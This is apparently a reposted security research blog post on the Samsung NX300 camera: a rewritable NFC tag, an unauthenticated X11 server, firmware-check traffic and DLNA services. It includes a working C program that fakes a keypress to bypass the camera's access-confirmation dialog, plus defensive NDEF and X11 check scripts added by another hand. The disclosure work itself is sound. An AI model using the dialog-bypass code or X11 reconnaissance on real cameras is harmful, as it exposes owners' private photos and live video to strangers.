Hacking the Samsung NX300 'Smart' Camera

2023-04-03 17:32:46

Georg Lukas, 2014-05-07 18:45

The Samsung NX300
smart camera is a middle-class mirrorless digital camera with NFC and WiFi
connectivity. You can join it to your local WiFi network to upload
pictures to cloud services, share pictures via
DLNA or
obtain remote access from your smartphone. For the latter, the camera provides
the Remote Viewfinder and MobileLink modes, where it creates an
unencrypted access point with wide-open access to its X server and to any
data which you'd expect to be available only to your smartphone.

Because hardware engineers suck at software security, nothing else was to be
expected. However, the following will show how badly they suck, if only
for documentation purposes.

This post is only covering the network connectivity of the NX300.
Read the follow-up posts for getting a root shell
and adding features to the camera.
The smartphone app deserves some attention as well. Feel free to do your own
analysis and post it to the
project wiki.

The findings in this blog post are based on firmware version 1.31.

NFC Tag

The NFC "connectivity" is an
NTAG203
made by NXP, which is pre-programmed with an NDEF message to download and
launch the (horribly designed)
Samsung SMART CAMERA App
from Google Play, and to tell the app about the access point name provided
by this individual camera:

Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX

Type: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager

The tag is writable, so a malicious user can easily "hack" your camera by
rewriting its tag to download some evil app, or to open nasty links in your
web browser, simply by touching it with an NFC-enabled smartphone. This was
confirmed by replacing the tag content with a URL.

The deployed tag supports permanent write-locking, so if a prankster
nerd locks it, you may end up with a camera stuck redirecting you to a hardcore
porn site.
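A small NDEF parser that checks whether a tag still carries exactly the two records described above, so a tampered tag (for instance one rewritten to a URI record) can be spotted before a phone acts on it. This is an added example, not code from the original post; the MAC suffix and the URI in the samples are constructed.

```python
import struct

TNF_WELL_KNOWN, TNF_MIME, TNF_EXTERNAL = 0x01, 0x02, 0x04
EXPECTED_MIME = b"application/com.samsungimaging.connectionmanager"
EXPECTED_PKG = b"com.samsungimaging.connectionmanager"
SSID_PREFIX = b"AP_SSC_NX300_0-"


def build_record(tnf, rtype, payload, first, last):
    """Short-record NDEF header: MB, ME and SR flags plus the TNF in the low 3 bits."""
    flags = (0x80 if first else 0) | (0x40 if last else 0) | 0x10 | tnf
    return bytes([flags, len(rtype), len(payload)]) + rtype + payload


def parse_ndef(msg):
    """Return [(tnf, type, payload), ...]; handles short and normal records and an optional ID."""
    records, pos = [], 0
    while pos < len(msg):
        flags = msg[pos]
        tnf, sr, il = flags & 0x07, flags & 0x10, flags & 0x08
        tlen = msg[pos + 1]
        if sr:
            plen, pos = msg[pos + 2], pos + 3
        else:
            plen, pos = struct.unpack_from(">I", msg, pos + 2)[0], pos + 6
        idlen = 0
        if il:
            idlen, pos = msg[pos], pos + 1
        rtype = msg[pos:pos + tlen]
        pos += tlen + idlen  # the ID field, if any, is skipped
        payload = msg[pos:pos + plen]
        pos += plen
        records.append((tnf, rtype, payload))
        if flags & 0x40:  # ME: last record of the message
            break
    return records


def check_camera_tag(msg):
    """True only if the tag holds exactly the MIME and android.com:pkg records the camera ships with."""
    recs = parse_ndef(msg)
    if len(recs) != 2:
        return False
    (t1, ty1, p1), (t2, ty2, p2) = recs
    return (t1 == TNF_MIME and ty1 == EXPECTED_MIME and p1.startswith(SSID_PREFIX)
            and t2 == TNF_EXTERNAL and ty2 == b"android.com:pkg" and p2 == EXPECTED_PKG)


# Constructed samples: the factory message (made-up MAC suffix) and a tag rewritten to a URI record.
FACTORY_TAG = (build_record(TNF_MIME, EXPECTED_MIME, SSID_PREFIX + b"12:34:56", True, False)
               + build_record(TNF_EXTERNAL, b"android.com:pkg", EXPECTED_PKG, False, True))
TAMPERED_TAG = build_record(TNF_WELL_KNOWN, b"U", b"\x01example.invalid", True, True)
```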

WiFi Networking

You can configure the NX300 to join your WiFi network, where it will behave like a
regular client with some open services, like DLNA. Let us see what exactly is
offered by performing a port scan:

megavolt:~# nmap -sS -O nx300

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
6000/tcp open  X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

This scan was performed while the "E-Mail" application was open. In AllShare
Play
and MobileLink modes, 7676/tcp is opened in addition. Further, in
Remote Viewfinder mode, the camera also opens 7679/tcp.

X Server

Wait, what? X11 as an open service? Could that be true? Surely it's
access-locked via TCP to prevent abuse?

georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
fixed

georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
   480x800        60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)

georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)

Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300

Nope! This really is an unprotected X server! It's running
Enlightenment! And we can even run apps on
it! But besides displaying stuff on the camera, the fun seems very limited:

NX300 xteddy
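The xlsfonts call above succeeds because the server accepts a client that presents no authorization at all. The check below, an added example and not code from the original post, sends the bare X11 connection setup request by hand and classifies the first byte of the reply (0 Failed, 1 Success, 2 Authenticate), which lets an owner verify that a display on their network refuses such clients; the host name nx300 follows the post, and the sample replies are constructed.

```python
import socket
import struct

X11_BASE_PORT = 6000  # TCP port for display :0, the one the nmap scan found open


def build_setup_request():
    """Client X11 connection setup: little-endian ('l'), protocol 11.0, empty auth name and data."""
    return struct.pack("<BxHHHHxx", ord("l"), 11, 0, 0, 0)


def classify_setup_reply(reply):
    """Map the server's setup reply to (verdict, reason) using its first byte."""
    if not reply:
        return ("no-reply", "")
    code = reply[0]
    if code == 1:
        return ("open", "server accepted a client that presented no authorization")
    if code == 0:
        # Failed: byte 1 is the reason length; the reason text starts at offset 8.
        n = reply[1]
        return ("refused", reply[8:8 + n].decode("latin-1", "replace"))
    if code == 2:
        # Authenticate: 2-byte length (in 4-byte units) at offset 6, then the reason text.
        n = struct.unpack_from("<H", reply, 6)[0] * 4
        return ("auth-required", reply[8:8 + n].decode("latin-1", "replace").rstrip("\x00"))
    return ("unknown", "unexpected reply code %d" % code)


def probe_display(host, display=0, timeout=3.0):
    """Connect to host:(6000 + display), send the setup request and classify the answer."""
    with socket.create_connection((host, X11_BASE_PORT + display), timeout=timeout) as sock:
        sock.sendall(build_setup_request())
        return classify_setup_reply(sock.recv(4096))


# Constructed sample replies for offline checks; nothing is sent to a real display here.
REPLY_OPEN = bytes([1]) + b"\x00" * 7  # Success: a wide-open server, as on the NX300
REASON = b"No protocol specified"
REPLY_REFUSED = struct.pack("<BBHHH", 0, len(REASON), 11, 0, 6) + REASON + b"\x00" * 3

if __name__ == "__main__":
    import sys
    print(probe_display(sys.argv[1] if len(sys.argv) > 1 else "nx300"))
```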

X11 Key Bindings

A short investigation using xev shows that the physical keys on the
camera body are bound to X11 key events as follows:

On/Off        XF86PowerOff (only when turning off)
Scroll Wheel  XF86ScrollUp / XF86ScrollDown
Direct Link   XF86Mail
Mode Wheel    F1 .. F10
Video Rec     XF86WebCam
+/-           XF86Reload
Menu          Menu
Fn            XF86HomePage
Keypad        KP_Left .. KP_Down, KP_Enter
Play          XF86Tools
Delete        KP_Delete

WiFi Client: Firmware Update Check

When the camera goes online, it performs a firmware version check.
First, it retrieves http://gld.samsungosp.com:

Request:

GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
Host: gld.samsungosp.com

Response:

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive

200 OK

This really looks like a no-op. But maybe it's a backdoor to allow
for remote code execution? Who knows…

Then, a query to
http://ipv4.connman.net/online/status.html
returns an empty document, but carries your location data (apparently
derived from the IP address) in the headers:

X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin

Wow! They know where I live! At least they don't transmit any unique identifiers with the query.

As the last step, the camera
asks for firmware versions
and gets redirected to an XML document with the ChangeLog.

Known versions so far:

WiFi Access Point: UPnP/DLNA

Two of the on-camera apps (MobileLink, Remote Viewfinder) open an
unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX
is the device part of its MAC address). Fortunately, Samsung's engineers were
smart and added a user confirmation dialog to the camera UI, to prevent remote
abuse:


NX300 Access Confirmation

Unfortunately, this dialog is running on a wide-open X server, so all we need
is to fake a KP_Return event (based on an
example by bharathisubramanian),
and we can connect with whichever client, stream a live video or download all
the private pictures from the SD card, depending on the enabled mode:

#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/extensions/XTest.h>
#include <X11/keysym.h>   /* XK_Return */
#include <unistd.h>
#include <stdio.h>

/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
 KeyCode keycode = 0, modcode = 0;
 keycode = XKeysymToKeycode (disp, keysym);
 if (keycode == 0) return;
 XTestGrabControl (disp, True);
 /* Generate modkey press */
 if (modsym != 0) {
  modcode = XKeysymToKeycode(disp, modsym);
  XTestFakeKeyEvent (disp, modcode, True, 0);
 }
 /* Generate regular key press and release */
 XTestFakeKeyEvent (disp, keycode, True, 0);
 XTestFakeKeyEvent (disp, keycode, False, 0);

 /* Generate modkey release */
 if (modsym != 0)
  XTestFakeKeyEvent (disp, modcode, False, 0);

 XSync (disp, False);
 XTestGrabControl (disp, False);
}

/* Main Function */
int main (){
 /* Opens the display named by $DISPLAY, e.g. nx300:0 */
 Display *disp = XOpenDisplay (NULL);
 if (disp == NULL) {
  fprintf (stderr, "cannot open display\n");
  return 1;
 }
 sleep (1);
 /* Send Return */
 SendKey (disp, XK_Return, 0);
 XCloseDisplay (disp);
 return 0;
}

DLNA Service: Remote Viewfinder

The DLNA service exposes some camera features, which are queried and
used by the Android app. The device's friendly name is [Camera]NX300,
as can be queried via HTTP from http://nx300:7676/smp_2_:

<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
  <deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
  <friendlyName>[Camera]NX300</friendlyName>
  <manufacturer>Samsung Electronics</manufacturer>
  <manufacturerURL>http://www.samsung.com</manufacturerURL>
  <modelDescription>Samsung Camera DMS</modelDescription>
  <modelName>SP1</modelName>
  <modelNumber>1.0</modelNumber>
  <modelURL>http://www.samsung.com</modelURL>
  <serialNumber>20081113 Folderview</serialNumber>
  <sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
  <UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
  <serviceList>
    <service>
      <serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
      <serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
      <controlURL>/smp_4_</controlURL>
      <eventSubURL>/smp_5_</eventSubURL>
      <SCPDURL>/smp_3_</SCPDURL>
    </service>
    <service>
      <serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
      <serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
      <controlURL>/smp_7_</controlURL>
      <eventSubURL>/smp_8_</eventSubURL>
      <SCPDURL>/smp_6_</SCPDURL>
    </service>
  </serviceList>
  <sec:deviceID>
  </sec:deviceID>
</device>

More SOAP actions are provided for changing settings like focus and
flash (/smp_3_):

Function               Arguments                                    Result
GetSystemUpdateID                                                   Id
GetSearchCapabilities                                               SearchCaps
GetSortCapabilities                                                 SortCaps
Browse                 ObjectID, BrowseFlag, Filter,                Result, NumberReturned,
                       StartingIndex, RequestedCount, SortCriteria  TotalMatches, UpdateID
GetIP                                                               GETIPRESULT
GetInfomation                                                       GETINFORMATIONRESULT, StreamUrl
SetResolution          RESOLUTION
ZoomIN                                                              CURRENTZOOM
ZoomOUT                                                             CURRENTZOOM
MULTIAF                                                             AFSTATUS
AF                                                                  AFSTATUS
setTouchAFOption       TOUCH_AF_OPTION                              SET_OPTION_RESULT
touchAF                AFPOSITION                                   TOUCHAF_RESULT
AFRELEASE                                                           AFRELEASERESULT
ReleaseSelfTimer                                                    RELEASETIMER
Shot                                                                AFSHOTRESULT
ShotWithGPS            GPSINFO                                      AFSHOTRESULT
SetLED                 LEDTIME
SetFlash               FLASHMODE
SetStreamQuality       Quality

Another service is available for picture / video streaming (/smp_4_):

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
    <GETINFORMATIONRESULT>
      <Resolutions>
        <Resolution><Width>5472</Width><Height>3648</Height></Resolution>
        <Resolution><Width>1920</Width><Height>1080</Height></Resolution>
      </Resolutions>
      <Flash>
        <Supports><Support>off</Support><Support>auto</Support></Supports>
        <Defaultflash>auto</Defaultflash>
      </Flash>
      <FlashDisplay>
        <Supports><Support>off</Support><Support>auto</Support></Supports>
        <CurrentFlashDisplay>off</CurrentFlashDisplay>
      </FlashDisplay>
      <ZoomInfo>
        <DefaultZoom>0</DefaultZoom>
        <MaxZoom>1</MaxZoom>
      </ZoomInfo>
      <AVAILSHOTS>289</AVAILSHOTS>
      <ROTATION>1</ROTATION>
      <StreamQuality>
        <Quality><Option>high</Option><Option>low</Option></Quality>
        <Default>high</Default>
      </StreamQuality>
    </GETINFORMATIONRESULT>
    <StreamUrl>
      <QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
      <QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
    </StreamUrl>
    </u:GetInfomationResponse>
  </s:Body>
</s:Envelope>

After triggering the appropriate commands, a live video stream should be available
from http://nx300:7679/livestream.avi. However, a quick attempt to get
some video with wget or mplayer failed.

The "source code" package provided on
Samsung's OSS Release Center is 834 MBytes
compressed and mainly contains three copies of the rootfs image (400-500MB
each), and then some scripts. The actual build root is hidden beneath the second
paper sheet link in the "Announcements" column.

Also, there are Obamapics in
TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.

The project is built on an ancient version of
Tizen, on which I'm no expert. Somebody else
needs to take this stuff apart, make a proper build environment, or port
OpenWRT to it.

Comments on HN
